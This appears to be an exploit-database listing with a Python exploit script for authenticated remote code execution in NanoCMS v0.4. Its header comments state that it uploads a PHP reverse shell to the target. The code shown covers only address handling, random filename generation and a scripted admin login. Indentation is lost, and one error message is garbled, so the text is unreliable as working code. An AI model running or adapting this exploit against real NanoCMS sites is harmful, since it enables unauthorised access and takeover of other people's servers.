Exploits / Vulnerability Discovered : 2022-08-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Nanocms v0.4 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-26
# Exploit Auuthor: p1ckzi
# Vendor Homepage: https://github.com/kalyan02/NanoCMS
# Version: NanoCMS v0.4
# Tested on: Linux Mint 20.3
# CVE: N/A
#
# Description:
# this script uploads a php reverse shell to the target.
# NanoCMS does not sanitise the data of an authenticated user while creating
# webpages. pages are saved with .php extensions by default, allowing an
# authenticated attacker access to the underlying system:
# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt
# appends a '/' if not supplied at the end of the address.
def address_check(address):
check = re.search('/$', address)
if check is not None:
print('')
else:
arguments.option.address += "/"
# creates a new filename for each upload.
# errors occur if the filename is the same as a previously uploaded one.
def random_filename():
random_filename.name = secrets.token_hex(4)
# note: after a successful login, credentials are saved, so further reuse
# of the script will most likely not require correct credentials.
def login(address, user, passwd):
post_header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
"Gecko/20100101 Firefox/91.0",
"Accept": "text/html,application/xhtml+xml,"
"application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "",
"Connection": "close",
"Referer": f"{arguments.option.address}data/nanoadmin.php",
"Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
"Upgrade-Insecure-Requests": "1",
}
post_data = {
"user": f"{user}",
"pass": f"{passwd}"
}
url_request = requests.post(
address + 'data/nanoadmin.php?',
headers=post_header,
data=post_data,
verify=False,
timeout=30
)
signin_error = url_request.text
if 'Error : wrong Username or Password' in signin_error:
print(
f"{settings.c1}{settings.i2}could "
f"sign in with {arguments.option.user}/"
f"{arguments.option.passwd}.{settings.c0}"
)
sys.exit(1)
else:
print(
f"{settings.c2}{settings.i1}logged in successfully."
f"{settings.c0}"
)